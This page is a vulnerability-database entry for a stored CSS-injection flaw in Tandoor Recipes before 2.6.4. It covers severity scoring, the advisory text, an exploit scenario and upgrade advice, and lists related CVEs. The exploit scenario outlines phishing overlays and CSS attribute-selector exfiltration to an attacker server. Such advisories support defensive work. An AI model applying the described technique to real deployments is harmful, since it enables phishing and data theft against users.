Severity by source
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
4DescriptionGitHub Advisory
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Prior to 2.6.4, Tandoor Recipes allows authenticated users to inject arbitrary <style> tags into recipe step instructions. The bleach.clean() sanitizer explicitly whitelists the <style> tag, causing the backend to persist and serve unsanitized CSS payloads via the API. Any client consuming instructions_markdown from the API and rendering it as HTML without additional sanitization will execute attacker-controlled CSS - enabling UI redressing, phishing overlays, visual defacement, and CSS-based data exfiltration. This vulnerability is fixed in 2.6.4.
AnalysisAI
Tandoor Recipes prior to version 2.6.4 allows authenticated users to inject malicious CSS via <style> tags in recipe step instructions due to improper sanitization by the bleach.clean() library, which whitelists <style> tags by default. Client applications rendering the instructions_markdown field from the API without additional sanitization will execute attacker-controlled CSS, enabling UI redressing, phishing overlays, visual defacement, and CSS-based data exfiltration attacks. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Vulnerability AssessmentAI
| Risk Assessment | This vulnerability presents moderate real-world risk despite a moderate CVSS score of 5.4. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated user with recipe editing permissions injects a malicious <style> tag containing CSS that redefines the login form position and opacity, overlaying a phishing form on top when another user views the recipe instructions via a web client. Alternatively, an attacker crafts CSS attribute selectors (e.g., input[value^="admin"]) to exfiltrate text via background-image URL calls to an attacker-controlled server. … |
| Remediation | Upgrade Tandoor Recipes to version 2.6.4 or later, which addresses the sanitization bypass. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Tandoor Recipes prior to 2.5.1 contains a blind server-side request forgery vulnerability in the Cookmate recipe import
Tandoor Recipes 2.0.0-alpha-1, fixed in 2.0.0-alpha-2, is vulnerable to privilege escalation. Rated medium severity (CVS
Path traversal in Tandoor Recipes prior to 2.5.1 allows authenticated users with import permissions to read arbitrary fi
Privilege escalation in Tandoor Recipes prior to version 2.6.4 allows authenticated users with read-only shared access t
Authenticated users can modify and expose private recipes in Tandoor Recipes through broken object-level authorization i
Unauthenticated API input validation flaws in Tandoor Recipes (<2.6.4) enable cross-tenant data leakage and denial of se
Tandoor Recipes versions prior to 2.6.0 allow authenticated remote attackers to cause denial of service by injecting URL
Tandoor Recipes versions prior to 2.6.5 suffer from a denial-of-service vulnerability in the recipe import functionality
Tandoor Recipes versions prior to 2.6.0 allow authenticated admin users to bypass space isolation controls and trigger s
Tandoor Recipes versions prior to 2.6.0 fail to strip EXIF metadata from WebP and GIF image uploads, exposing sensitive
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated high severity
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-19390